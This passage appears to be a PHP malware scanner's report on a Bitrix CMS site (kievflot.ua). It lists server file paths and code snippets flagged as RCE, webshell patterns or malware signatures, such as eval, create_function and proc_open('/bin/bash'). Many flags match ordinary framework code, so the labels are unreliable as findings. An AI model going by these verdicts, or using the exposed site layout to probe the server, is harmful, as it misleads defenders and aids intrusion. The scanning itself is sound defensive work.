exec() { $this->request = Context::getCurrent()->getRequest(); $this->action = $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse(); } } $controller = new B24CButtonListAjaxController(); $controller->exec()
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/include/actionsdefinitions.php Size: 14.99 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/include/rolesdefinitions.php Size: 2.22 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/serversdata.php Size: 5.18 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/action.php Size: 6.78 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("", $paramCode); if(is_callable($func)) { $res = $func(); $retStr = str_replace('##CODE_PARAMS:'.$paramId.'##', $res, $retStr); } } } foreach ($this->freeParams as $key => $paramValue) $retStr = str_replace('##'.$key.'##', $paramValue, $retStr); return $retStr; } public function start(array $inputParams = array()) { if(!is_array($inputParams)) throw new \Bitrix\Main\ArgumentTypeException("inputParams", "array"); if(isset($this->actionParams["MODIFYERS"]) && is_array($this->action...
| Function strrev exec_strrev Line: 154 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
cExe
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/monitoring.php Size: 14.76 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$data', $item["DATA_FUNC"]); if(is_callable($func)) { $result = $func($data); } } else { if(isset($data["calcpr"])) { $data["data"] = $data["calcpr"]; } $result = static::extractRrdValue($data); } return $result; } protected static function extractRrdValue($data) { $result = false; if(isset($data["data"]) && is_array($data["data"])) { reset($data["data"]); $result = current($data["data"]); } return trim($result); } protected static function getAnsibleSetup($hostname) { static $i...
| Function strrev exec_strrev Line: 340 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
cExe
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/helper.php Size: 4.89 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/sitesdata.php Size: 2.32 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/provider.php Size: 6.41 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/actionmodifyer.php Size: 3.35 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/shelladapter.php Size: 1.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:54 Warns: 3 Dangers: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($command. " > ".$outputPath." 2>&1 &"); return true; } public function getLastOutput() { return $this->resOutput; } public function getLastError() { return $this->resError; } public function syncExec($command) { $command = $this->prepareExecution($command); $retVal = 1; $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $pipes = array(); $process = proc_open('/bin/bash', $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0...
| Function proc_close Line: 93 Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] |
proc_close($process)
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] |
proc_open('/bin/bash', $descriptorspec, $pipes); if (is_resource($process)) { fwrite($pipes[0], $command); fclose($pipes[0]); $this->resOutput = stream_get_contents($pipes[1]); fclose($pipes[1]); $this->resError = stream_get_contents($pipes[2]); fclose($pipes[2]); $retVal = proc_close($process)
| Function strrev exec_strrev Line: 39 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
cExe
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lib/actionsdata.php Size: 6.54 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$param', $fBody); $result = $newfunc($buildParam); } return $result; } public static function setLogLevel($logLevel) { self::$logLevel = $logLevel; } public static function checkRunningAction() { $result = array(); $shellAdapter = new ShellAdapter(); $execRes = $shellAdapter->syncExec("sudo -u root /opt/webdir/bin/bx-process -a list -o json"); $data = $shellAdapter->getLastOutput(); if($execRes) { $arData = json_decode($data, true); $result = array(); if(isset($arData["params"])...
| Function strrev exec_strrev Line: 85 Dangerous Encoded Function `exec` [https://www.php.net/exec] |
cExe
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/admin/menu.php Size: 1.17 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Exploit php_uname Line: 13 Dangerous RCE (Remote Code Execution) allow remote attackers to execute arbitrary commands or code on the target machine |
php_uname('s')
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lang/ru/include/actionsdefinitions.php Size: 3.88 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/scale/lang/en/include/actionsdefinitions.php Size: 2.94 kB Created: 2017-11-21 16:21:51 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/lib/base/controller.php Size: 12.52 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { try { $this->collectDebugInfo(); $this->resolveAction(); $this->checkAction(); if ($this->prepareParams() && $this->errorCollection->isEmpty() && $this->processBeforeAction($this->getAction()) === true) { $this->runAction(); } $this->logDebugInfo(); } catch(\Exception $e) { $this->errorCollection->add(array(new Error($e->getMessage()))); } if (!$this->errorCollection->isEmpty()) { $this->sendJsonErrorResponse(); } } protected function collectDebugInfo() { if($this->collectDebugInfo) { D...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/options.php Size: 4.53 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 33 Warning Double var technique is usually used for the obfuscation of malicious code |
${$name[0]}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/admin/vote_dialog.php Size: 1.75 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/vote_tools.php Size: 17.63 kB Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/index.php Size: 8.21 kB Created: 2017-06-13 15:03:02 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/public/tools/vote_chart.php Size: 448.00 B Created: 2017-05-21 22:21:37 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/vote/install/tools/vote_chart.php Size: 448.00 B Created: 2017-06-13 15:03:02 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/asd.iblock/classes/general/iblock_action.php Size: 30.32 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:51 Dangers: 1
| Description | Match |
|---|
Exploit download_remote_code2 Line: 28 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine |
fwrite($hdlOutput, CASDiblockTools::ExportPropsToXML($BID, $_REQUEST['p'])
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/asd.iblock/install/index.php Size: 5.90 kB Created: 2017-05-21 22:21:44 Modified: 2023-06-30 13:57:51 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/search/default_option.php Size: 714.00 B Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Sign b236d073 Line: 4 Dangerous Malware Signature (hash: b236d073) |
/*;*/
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/translate_tools.php Size: 13.14 kB Created: 2017-11-21 16:21:45 Modified: 2023-06-30 13:57:54 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/admin/translate_edit.php Size: 16.87 kB Created: 2017-05-21 22:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/translate/admin/translate_list.php Size: 19.90 kB Created: 2017-11-21 16:21:45 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/include.php Size: 86.18 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 2
| Description | Match |
|---|
Exploit double_var2 Line: 2472 Warning Double var technique is usually used for the obfuscation of malicious code |
${$sOrderVar}
| Exploit double_var2 Line: 2475 Warning Double var technique is usually used for the obfuscation of malicious code |
${$sOrderVarE}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/classes/general/forum_new.php Size: 88.51 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=intval(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); } elseif ($type == "double") { array_walk($vals, create_function("&\$item", "\$item=doubleval(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); } elseif ($type == "datetime") { array_walk($vals, create_function("&\$item", "\$item=\"'\".\$GLOBALS[\"DB\"]->CharToDateFunction(\$GLOBALS[\"DB\"]->ForSql(\$item), \"FULL\").\"'\";")); $vals = array_unique($vals); $val = im...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/mail/mail.php Size: 20.34 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.rules/lang/en/component.php Size: 4.71 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Dangers: 1
| Description | Match |
|---|
Sign 407651f7 Line: 27 Dangerous Malware Signature (hash: 407651f7) |
warez
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.topic.list/component.php Size: 23.88 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 244 Warning Double var technique is usually used for the obfuscation of malicious code |
${$PAGEN_NAME}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.topic.active/component.php Size: 18.38 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 11 Warning Double var technique is usually used for the obfuscation of malicious code |
${$s}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/forum/install/components/bitrix/forum.index/component.php Size: 18.80 kB Created: 2017-05-21 22:21:43 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 111 Warning Double var technique is usually used for the obfuscation of malicious code |
${$PAGEN_NAME}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include/prolog_after.php Size: 4.52 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include/urlrewrite.php Size: 5.13 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/servicemanager.php Size: 1.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 55 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$obj[1]()
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/mail/eventmessagethemecompiler.php Size: 10.14 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('use \Bitrix\Main\Mail\EventMessageThemeCompiler; ob_start();?>' . $template . '<? return ob_get_clean();'); } catch(StopException $e) { ob_clean(); throw $e; } return $result; } protected function addReplaceCallback($identificator, $callback) { $this->replaceCallback[$identificator] = $callback; } protected function executeReplaceCallback() { $arReplaceIdentificators = array(); $arReplaceStrings = array(); foreach($this->replaceCallback as $identificator => $callback) { $result = call_user...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/data/connectionpool.php Size: 8.44 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/modulemanager.php Size: 2.94 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/config/configuration.php Size: 9.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/config/option.php Size: 11.03 kB Created: 2017-11-21 16:20:19 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Exploit double_var2 Line: 133 Warning Double var technique is usually used for the obfuscation of malicious code |
${$varName}
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/fileinputreceiver.php Size: 6.95 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->getAgent()->checkPost()
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/fileinputunclouder.php Size: 3.06 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec($mode = "basic", $params = array()) { $res = $this->check($params); if ($this->check($params)) { $this->file = \CFile::getByID($this->id)->fetch(); if ($mode == "resize" && ($file = \CFile::ResizeImageGet($this->id, $params, BX_RESIZE_IMAGE_PROPORTIONAL, true)) && $file) { $this->file["SRC"] = $file["src"]; $this->file["WIDTH"] = $file["width"]; $this->file["HEIGHT"] = $file["height"]; $this->file["FILE_SIZE"] = $file["size"]; } \CFile::ViewByUser($this->file, array("force_download" => fals...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/ui/uploader/uploader.php Size: 12.91 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('&$v,$k', 'if($k=="error"){$v=preg_replace("/<(.+?)>/is".BX_UTF_PCRE_MODIFIER, "", $v);}')); return self::removeTmpPath($data); } protected function fillRequireData() { $this->mode = $this->getRequest("mode"); if (!in_array($this->mode, array("upload", "delete", "view"))) throw new ArgumentOutOfRangeException("mode"); if ($this->mode != "view" && !check_bitrix_sessid()) throw new AccessDeniedException("Bad sessid."); $this->version = $this->getRequest("version"); $directory = \CB...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/page/asset.php Size: 58.20 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$matches', 'return $matches[1].Bitrix\Main\Page\Asset::replaceUrlCSS($matches[3], $matches[2], "'.addslashes($path).'").")";'), $content ); $content = preg_replace_callback( '#(\s*@import\s*)([\'"])([^\'"]+)(\2)#si', create_function('$matches', 'return $matches[1].Bitrix\Main\Page\Asset::replaceUrlCSS($matches[3], $matches[2],"'.addslashes($path).'");'), $content ); return $content; } public function groupJs($from = '', $to = '') { if(empty($from) || empty($to)) { return; } $to ...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/entity/base.php Size: 20.70 kB Created: 2017-11-21 16:20:30 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval($eval); $entity = self::getInstance($entity_name); foreach ($fieldsMap as $k => $v) { $entity->addField($v, $k); } return $entity; } public static function compileEntity($entityName, $fields = null, $parameters = array()) { $classCode = ''; $classCodeEnd = ''; if (strtolower(substr($entityName, -5)) !== 'table') { $entityName .= 'Table'; } if (!preg_match('/^[a-z0-9_]+$/i', $entityName)) { throw new Main\ArgumentException(sprintf( 'Invalid entity classname `%s`.', $entityName )); } $fullEnt...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/entity/query.php Size: 75.74 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->is_executing = true; $query = $this->buildQuery(); $cacheId = ""; $ttl = 0; $result = null; if($this->cacheTtl > 0 && (empty($this->join_map) || $this->cacheJoins == true)) { $ttl = $this->entity->getCacheTtl($this->cacheTtl); } if($ttl > 0) { $cacheId = md5($query); $result = $this->entity->readFromCache($ttl, $cacheId, $this->countTotal); } if($result === null) { $result = $this->query($query); if($ttl > 0) { $result = $this->entity->writeToCache($result, $cacheId, $this->count...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/db/connection.php Size: 21.29 kB Created: 2017-11-21 16:20:28 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/eventmanager.php Size: 12.57 kB Created: 2017-05-21 22:21:38 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'if ($a["SORT"] == $b["SORT"]) return 0; return ($a["SORT"] < $b["SORT"]) ? -1 : 1;'); foreach (array_keys($handlers) as $moduleId) { foreach (array_keys($handlers[$moduleId]) as $event) { uasort($this->handlers[$moduleId][$event], $funcSort); } } } $this->isHandlersLoaded = true; } protected function clearLoadedHandlers() { $managedCache = Application::getInstance()->getManagedCache(); $managedCache->clean(self::$cacheKey); foreach($this->handlers as $module=>$types) {...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/composite/responder.php Size: 18.28 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:54 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/userconsent/internals/componentcontroller.php Size: 1.99 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Warns: 1
| Description | Match |
|---|
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] |
exec() { $this->request = Context::getCurrent()->getRequest(); $this->action = $this->request->get('action'); $this->prepareRequestData(); if($this->check()) { call_user_func_array($this->getActionCall(), array($this->requestData)); } $this->giveResponse()
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/lib/userconsent/consent.php Size: 3.39 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:54 Dangers: 1
| Description | Match |
|---|
Exploit nano Line: 99 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] |
$provider['DATA']($originId)
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/include.php Size: 22.67 kB Created: 2017-11-21 16:21:35 Modified: 2023-06-30 13:57:52 Dangers: 2
| Description | Match |
|---|
Sign 99fc3b9d Line: 101 Dangerous Malware Signature (hash: 99fc3b9d) |
$GLOBALS['____
| Sign d97f004d Line: 101 Dangerous Malware Signature (hash: d97f004d) |
ZGVmaW5l
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component_util.php Size: 49.31 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 6
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_b24.php Size: 9.88 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function syslog Warning Potentially dangerous function `syslog` [https://www.php.net/syslog] |
syslog(LOG_INFO, $_SERVER["HTTP_HOST"]."\tstart\t".$moduleId.$arUpdaters[$i1][0]); CUpdateClient::RunUpdaterScript($this->updatersDir.$moduleId.$arUpdaters[$i1][0], $errorMessageTmp, "", $moduleId); syslog(LOG_INFO, $_SERVER["HTTP_HOST"]."\tend\t".$moduleId.$arUpdaters[$i1][0]."\t".$errorMessageTmp); if (strlen($errorMessageTmp) > 0) $errorMessage .= str_replace("#MODULE#", $moduleId, str_replace("#VER#", $arUpdaters[$i1][1], GetMessage("SUPP_UK_UPDN_ERR"))).": ".$errorMessageTmp."."; $this->Col...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/user.php Size: 138.93 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/database.php Size: 33.13 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 4
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_update.php Size: 89.67 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval("DescrDetList_"+sModule));
wnd.document.write('</font>');
wnd.document.write('\n</body></html>');
}
//-->
</script>
<table border="0" cellspacing="1" cellpadding="2" width="99%">
<tr>
<td align="center" class="tablehead1"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DATE") ?></font></td>
<td align="center" class="tablehead2"><font class="tableheadtext"><?= GetMessage("SUP_HIST_DESCR") ?></font></td>
<td align="center" class="tablehead3"><font class="tablehe...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/update_log.php Size: 4.71 kB Created: 2017-11-20 14:16:06 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a['.$sort.'], $b['.$sort.'])*('.$ord.');')); } $rsData = new CAdminResult(null, $sTableID); $rsData->InitFromArray($arLogRecs); $rsData->NavStart(); $lAdmin->NavText($rsData->GetNavPrint(GetMessage("update_log_nav"))); $n = 0; while($rec = $rsData->Fetch()) { $row = &$lAdmin->AddRow(0, null); $aDate = explode(" ", htmlspecialcharsbx($rec[1])); $row->AddField("DATE", '<span style="white-space:nowrap">'.$aDate[0].'</span> '.$aDate[1]); $row->AddField("DESC...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/checklist.php Size: 41.67 kB Created: 2017-11-21 16:20:18 Modified: 2023-06-30 13:57:52 Dangers: 1
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/vuln_scanner.php Size: 63.50 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Dangers: 1
| Description | Match |
|---|
Sign f9dc0a55 Line: 1938 Dangerous Malware Signature (hash: f9dc0a55) |
'base64_decode'
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/zip.php Size: 66.90 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] |
eval('$res = '.$arParams['callback_pre_add'].'(\'callback_pre_add\', $arLocalHeader);'); if ($res == 0) { $arHeader['status'] = "skipped"; $res = 1; } if ($arHeader['stored_filename'] != $arLocalHeader['stored_filename']) { $arHeader['stored_filename'] = $this->_reducePath($arLocalHeader['stored_filename']); } } if ($arHeader['stored_filename'] == "") { $arHeader['status'] = "filtered"; } if (strlen($arHeader['stored_filename']) > 0xFF) { $arHeader['status'] = 'filename_too_long'; } if ($arHeade...
| Sign 963e968a Line: 2571 Dangerous Malware Signature (hash: 963e968a) |
php_uname()
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component.php Size: 39.86 kB Created: 2017-11-21 16:21:36 Modified: 2023-06-30 13:57:52 Dangers: 2
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/component_template.php Size: 30.34 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Dangers: 3
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/sql_util.php Size: 22.78 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function("&\$item", "\$item=IntVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tmp[] = "(1 = 2)"; else $arSqlSearch_tmp[] = (($strNegative == "Y") ? " NOT " : "")."(".$arFields[$key]["FIELD"]." IN (".$val."))"; } elseif ($arFields[$key]["TYPE"] == "double") { array_walk($vals, create_function("&\$item", "\$item=DoubleVal(\$item);")); $vals = array_unique($vals); $val = implode(",", $vals); if (count($vals) <= 0) $arSqlSearch_tm...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/grids.php Size: 16.11 kB Created: 2017-05-21 22:21:41 Modified: 2023-06-30 13:57:52 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
create_function('$a, $b', 'return strcmp($a["name"], $b["name"]);')); return $arThemes; } public static function GetTheme($grid_id) { $aOptions = CUserOptions::GetOption("main.interface.grid", $grid_id, array()); if($aOptions["theme"] == '') { $aGlobalOptions = CUserOptions::GetOption("main.interface", "global", array(), 0); if($aGlobalOptions["theme_template"][SITE_TEMPLATE_ID] <> '') $theme = $aGlobalOptions["theme_template"][SITE_TEMPLATE_ID]; else $theme = ""; } else { $theme = $aOptions["th...
|
|
/var/www/kievflotq/kievflot.ua/bitrix/modules/main/classes/general/main.php Size: 144.72 kB Created: 2017-11-21 16:20:29 Modified: 2023-06-30 13:57:52 Warns: 4 Dangers: 8
| Description | Match |
|---|
Exploit double_var2 Line: 223 Warning Double var technique is usually used for the obfuscation of malicious code |
${$key}
| Exploit execution Line: 1424 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].$path)
| Exploit execution Line: 207 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog_admin_after.php")
| Exploit execution Line: 209 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog_admin.php")
| Exploit execution Line: 289 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/prolog".$isAdmin. "_after.php")
| Exploit execution Line: 306 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/interface/auth/wrapper.php")
| Exploit execution Line: 316 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] |
include($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/include/epilog".$isAdmin.".php")
| Exploit silenced_eval Line: 4588 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine |
@eval("return ".$strCondition.";")
| Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] |
